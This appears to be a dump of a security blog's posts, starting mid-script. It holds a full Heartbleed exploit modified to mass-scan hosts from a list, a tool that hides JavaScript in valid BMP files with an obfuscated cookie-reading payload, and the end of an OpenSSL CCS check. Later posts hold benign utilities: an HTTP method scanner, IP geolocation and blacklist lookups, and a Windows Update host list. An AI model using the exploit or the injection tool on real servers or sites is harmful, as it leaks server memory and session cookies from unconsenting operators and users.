strLastMessage = recv
if (ord(recv[0])==21):
fVuln = False
break
try:
if ord(strLastMessage[-7]) == 21: # Check if an alert was at the end of the last message.
fVuln=False
except IndexError:
pass
if fVuln:
print "[%s] %s:%d allows early CCS" % (strVer,strHost,iPort)
iVulnCount += 1
else:
print "[%s] %s:%d rejected early CCS" % (strVer,strHost,iPort)
else:
print "[%s] No response from %s:%d" % (strVer,strHost,iPort)
try:
s.close()
except:
pass
if iVulnCount > 0:
print "***This System Exhibits Potentially Vulnerable Behavior***"
quit(1)
else:
print "No need to patch."
quit(0)
</code></pre>
<span style="font-family: inherit;"><span style="background-color: white;"><br /></span>
</span><br />
<b><span style="font-family: inherit;">
<span style="background-color: white;">Reference:</span></span></b><br />
<span style="font-family: inherit;">- http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/</span><br />
<span style="font-family: inherit;">- http://www.openssl.org/news/secadv_20140605.txt</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><span style="background-color: white;">Thanks.</span> </span>Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-43649847022133280072014-04-09T15:35:00.001+08:002014-04-10T01:15:20.656+08:00A OpenSSL HeartBleed vulnerability Python<span style="font-family: inherit;">As you know, At 8/Apr/2014, Called OpenSSL heartbleed ZeroDay bug is security vulnerability.</span><br />
<span style="font-family: inherit;">A hacker could gain Server's memory chuck using this vulnerability</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-size: 11pt;"><span style="font-family: inherit;">Affected SSL version:</span></span></o:p></div>
<div style="font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-size: 11pt;"><span style="font-family: inherit;">OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable</span></span></o:p></div>
<span style="font-family: inherit;"><o:p><span lang="EN-US" style="font-size: 11pt;">OpenSSL
1.0.1g is NOT vulnerable</span></o:p></span><br />
<span style="font-family: inherit;"><o:p><span lang="EN-US" style="font-size: 11pt;">OpenSSL 1.0.0 branch is NOT vulnerable</span></o:p></span><br />
<span style="font-family: inherit;"><o:p><span lang="EN-US" style="font-size: 11pt;">OpenSSL
0.9.8 branch is NOT vulnerable</span></o:p></span><br />
<br />
<div style="font-family: 굴림; font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-family: Arial; font-size: 11pt;"><br /></span></o:p></div>
<div style="font-family: 굴림; font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-family: Arial; font-size: 11pt;">I need check servers, so I modified the exploit to check lots servers.</span></o:p></div>
<div style="font-family: 굴림; font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-family: Arial; font-size: 11pt;"><br /></span></o:p></div>
<div style="font-family: 굴림; font-size: 12pt; margin-bottom: 3.75pt; margin-right: 0cm;">
<o:p><span lang="EN-US" style="font-family: Arial; font-size: 11pt;"><br /></span></o:p></div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
'''
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
'''
def ip_n_port(i):
data = str(i).replace("\n","")
data = str(i).replace(" ","")
data = data.split(":")
ip = data[0]
port = data[1]
return ip, port
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s, ip, port):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'ip: %s, port: %s' % (ip, port)
fp = open('result.txt', 'a')
fp.write('%s:%s' % (ip, port))
fp.close()
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main(ip, port):
'''
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
'''
print ip, port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((ip, int(port)))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s, ip, port)
if __name__ == '__main__':
f = open("lists.txt", "r")
for i in f:
ip, port = ip_n_port(i)
try:
main(ip, port)
except:
print ('no connection')
f.close()
</code></pre>
<br />
The file(lists.txt) is loading IPs should be "ip:port".<br />
e. g,<br />
1111:443<br />
2222:8443<br />
<br />
Reference:<br />
http://www.exploit-db.com/exploits/32745/<br />
http://heartbleed.com/<br />
<br />
Thanks.Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-13207255705178821192014-03-31T13:36:00.001+08:002020-01-07T02:09:05.437+08:00BMP INJECTION Python.It helps to inject source to BMP.<br />
If you need to test uploading BMP with javascript, you could use bmpinjection.py.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> #!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import os
#---------------------------------------------------------
def _hexify(num):
"""
Converts and formats to hexadecimal
"""
num = "%x" % num
if len(num) % 2:
num = '0'+num
return num.decode('hex')
#---------------------------------------------------------
#Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
#;alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
"""
Generates a fake but valid BMP within scriting
"""
f = open(fname, "wb")
header = (b'\x42\x4D' #Signature BM
b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
b'\x00\x00\x00\x00' #Reserved
b'\x00\x00\x00\x00' #bitmap data offset
b''+ _hexify( len(payload) ) + #bitmap header size
b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
b'\x00\x00' #nb_plan
b'\x00\x00' #nb per pixel
b'\x00\x10\x00\x00' #compression type
b'\x00\x00\x00\x00' #image size .. its ignored
b'\x00\x00\x00\x01' #Horizontal resolution
b'\x00\x00\x00\x01' #Vertial resolution
b'\x00\x00\x00\x00' #number of colors
b'\x00\x00\x00\x00' #number important colors
b'\x00\x00\x00\x80' #palet colors to be complient
b'\x00\x80\xff\x80' #palet colors to be complient
b'\x80\x00\xff\x2A' #palet colors to be complient
b'\x2F\x3D\x31\x3B' #*/=1;
)
# I made this explicit, step by step .
f.write(header)
f.write(payload)
f.close()
return True
#---------------------------------------------------------
def _generate_launching_page(f):
"""
Creates the HTML launching page
"""
htmlpage ="""<html>
<head><title>Opening an image</title> </head>
<body>
<img src=\"""" + f + """\"\>
<script src= \"""" + f + """\"> </script>
</body>
</html>
"""
html = open("run.html", "wb")
html.write(htmlpage);
html.close()
return True
#---------------------------------------------------------
def _inject_into_file(payload, fname):
"""
Injects the payload into existing BMP
NOTE: if the BMP contains \xFF\x2A might caouse issues
"""
# I know, I can do it all in memory and much more fast.
# I wont do it here.
f = open(fname, "r+b")
b = f.read()
b.replace(b'\x2A\x2F',b'\x00\x00')
f.close()
f = open(fname, "w+b")
f.write(b)
f.seek(2,0)
f.write(b'\x2F\x2A')
f.close()
f = open(fname, "a+b")
f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
f.write(payload)
f.close()
return True
#---------------------------------------------------------
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("filename",help="the bmp file name to be generated/or infected")
parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
args = parser.parse_args()
print("""
|======================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
| It is the end user's responsibility to obey all applicable local, state and federal laws. |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program |
|======================================================================================================|
""")
if args.inject_to_existing_bmp:
_inject_into_file(args.js_payload, args.filename)
else:
_generate_and_write_to_file(args.js_payload, args.filename)
_generate_launching_page(args.filename)
print "[+] Finished!"
</code></pre>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"
</code></pre>
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-55080721654104853712014-03-20T15:44:00.001+08:002014-03-20T15:44:31.251+08:00Web METHOD CHECKSometimes, I need to check many URLs' methods such as "TRACE", "DELETE", "PUT", "COPY".<br />
<br />
So, I just make simple python code. :)<br />
<br />
Readme:<br />
url.txt : you should have url lists in same directory.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> import socket, sys, re
import string
def main():
# Fillter SSL PORT
ssl_port = 443
# Common Port Mode
port = ["80"]
# INTERNAL URL
urldata = open("url.txt", "r")
count = 0
for i in urldata:
count += 1
i = i.strip('\n')
for j in port:
isheader(i, int(j), count, ssl_port)
urldata.close()
print("\r\nFINISH. Thank you")
def savingR(port, num, url, msg):
fp_r = open("result_"+str(port)+".txt","a")
fp_r.write("["+str(num)+"]"+url+":"+str(port)+"-"+msg+"\r\n")
fp_r.flush()
fp_r.close()
def Msgprint(url, port, msg):
print("%s(%d): Done [%s]" %(url, port, msg))
def isheader(url, port, num, ssl_port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
try:
if (ssl_port == port):
try:
s.connect((url, port))
except socket.error:
msg = "Closed port(ssl)"
Msgprint(url, port, msg)
s.close()
return 0
s_ssl = socket.ssl(s)
s_ssl.write('OPTIONS / HTTP/1.0\r\n\r\n')
buf = s_ssl.read()
s.close()
else:
try:
s.connect((url, port))
except socket.error:
msg = "Closed port"
Msgprint(url, port, msg)
s.close()
return 0
s.send("OPTIONS / HTTP/1.0\r\n\r\n".encode('utf-8'))
buf = (s.recv(1024)).decode('utf-8')
s.close()
if not buf:
msg = "Not Return from this server"
Msgprint(url, port, msg)
return 0
msg = ''.join(re.findall('Allow:.*', buf))
if (msg == ""):
msg = "Nothing"
if(''.join(re.findall('PUT', msg))) or (''.join(re.findall('COPY', msg))) or (''.join(re.findall('DELETE', msg)) or (''.join(re.findall('TRACE', msg)))):
# To save results
num = num+1
savingR(port, num, url, msg)
msg += "] [*FOUND"
Msgprint(url, port, msg)
except:
msg = "Timeout"
Msgprint(url, port, msg)
s.close()
return 0
main()
</code></pre>
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-24960390076082514162014-02-20T18:01:00.002+08:002014-02-20T18:01:41.654+08:00IP location informationI made to have IP location information from IPs.<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> import urllib
def iplocation(*data):
response = urllib.urlopen('http://api.hostip.info/get_html.php?ip='+ data[0]+'&position=true').read()
return response
iplists = open('iplists.txt','r')
save = open('result.csv', 'w')
for ip in iplists:
ip = str(ip).replace("\n","")
print " "*8 + "[-] " + ip
response = iplocation(ip)
response = response.split("\n")
county = response[0].split(":")
result = county[1].strip()
save.write(ip + ",\"" + result + "\"\n")
if result:
print " "*12 + result
iplists.close()
save.close()
</code></pre>
<br />
Put IPs into iplists.txt, then it makes result.csv.<br />
<br />Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-20422792258282684612014-02-20T17:57:00.001+08:002014-02-20T18:02:02.133+08:00DNS BLACK LIST InformationI need to analysis some IPs, so I need to check DNS BLACK LISTS.<br />
<div>
<br /></div>
<div>
I made simple checking DNS black Lists using python.</div>
<div>
<br /></div>
<div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> import os
import re
import socket
import sys
import requests
from BeautifulSoup import BeautifulSoup
USER_AGENT = "Mozilla/5.0 (Windows NT 5.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
PRAGMA = "no-cache"
ACCEPT = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
def blacklist(dat):
ip = dat
type =None
status = ""
#path = "/query/bl?ip="
#path +=ip
host = "http://www.spamhaus.org/query/bl?ip="+ip
USER_AGENT = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36"
PRAGMA = "no-cache"
ACCEPT = "application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*"
results = requests.get(host,
params = {"ip": ip},
headers = {"Host": "www.spamhaus.org",
"User-Agent": USER_AGENT,
"Accept": ACCEPT,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "ko-KR",
"Connection": "keep-alive"
}
)
try:
html = results.text
except UnicodeDecodeError:
html = u' '.join(results.text).encode('utf-8').strip()
soup = BeautifulSoup(html)
tag = soup.findAll('b')
for item in tag:
if "is listed in the" in item.text:
#print item.text
status = "Block"
return status
else :
status = "Allow"
return status
iplists = open('iplists.txt','r')
save = open('result.csv', 'w')
for ip in iplists:
ip = str(ip).replace("\n","")
print " "*8 + "[-] " + ip
try:
result = blacklist(ip)
except UnicodeDecodeError:
result = u' '.join(blacklist(ip)).encode('utf-8').strip()
save.write(ip + ",\"" + result + "\"\n")
if result:
print " "*12 + result
iplists.close()
save.close()
</code></pre>
<br />
Input IPs to iplists.txt, then it makes result.csv.<br />
<br /></div>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0tag:blogger.com,1999:blog-4385614092107866208.post-54314992102380121122014-02-20T17:52:00.000+08:002014-02-20T17:52:12.120+08:00How to have window update IP ranges.I have considering a problem how to get window update IP ranges.<br />
<div>
I could find window update URLs. However, our firewall could not using URL information.</div>
<div>
It could use only IP that makes the problem.</div>
<div>
<br /></div>
<div>
Just I share window update URL.</div>
<div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
download.windowsupdate.com
c.microsoft.com
windowsupdate.microsoft.com
v4.windowsupdate.microsoft.com
windowsupdate.com
ntservicepack.microsoft.com
wustat.windows.com
au.download.windowsupdate.com
updates.installshield.com
microsoft.com
urs.microsoft.com
go.microsoft.com
start.microsoft.com
crl.microsoft.com
catalog.update.microsoft.com
validation.sls.microsoft.com
na.activation.sls.microsoft.com
activation.sls.microsoft.com
sls.microsoft.com.nsatc.net
validation.sls.microsoft.com.nsatc.net
activation.sls.microsoft.com.nsatc.net
emea.activation.sls.microsoft.com
mpa.one.microsoft.com
download.microsoft.com
</code></pre>
<br />
The Window update IPs are flexibled...</div>
Kerzhttp://www.blogger.com/profile/12464121047829340760noreply@blogger.com0